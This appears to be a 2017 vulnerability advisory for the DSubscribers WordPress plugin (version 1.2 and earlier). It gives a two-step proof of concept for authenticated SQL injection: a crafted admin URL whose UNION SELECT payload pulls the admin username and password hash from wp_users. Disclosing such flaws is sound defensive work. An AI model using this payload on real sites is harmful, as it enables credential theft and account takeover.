DSubscribers <= 1.2 - Authenticated SQL Injection

2017-07-0600:00:00

Lenon Leite / Log.pt

JSON

The DSubscribers WordPress plugin was affected by an Authenticated SQL Injection security vulnerability.

Proof of Concept:

1 – Login with admin user:

2 – Url attack:
 http://target/wp-admin/admin.php?page=dsubscribers&action=edit&dsubscribers=0 UNION SELECT 1,2,CONCAT(user_login,char(58),user_pass) FROM wp_users WHERE ID=1

References

lenonleite.com.br/en/2017/07/06/dsubscribers-1-2-plugin-wordpress-sql-injection/

JSON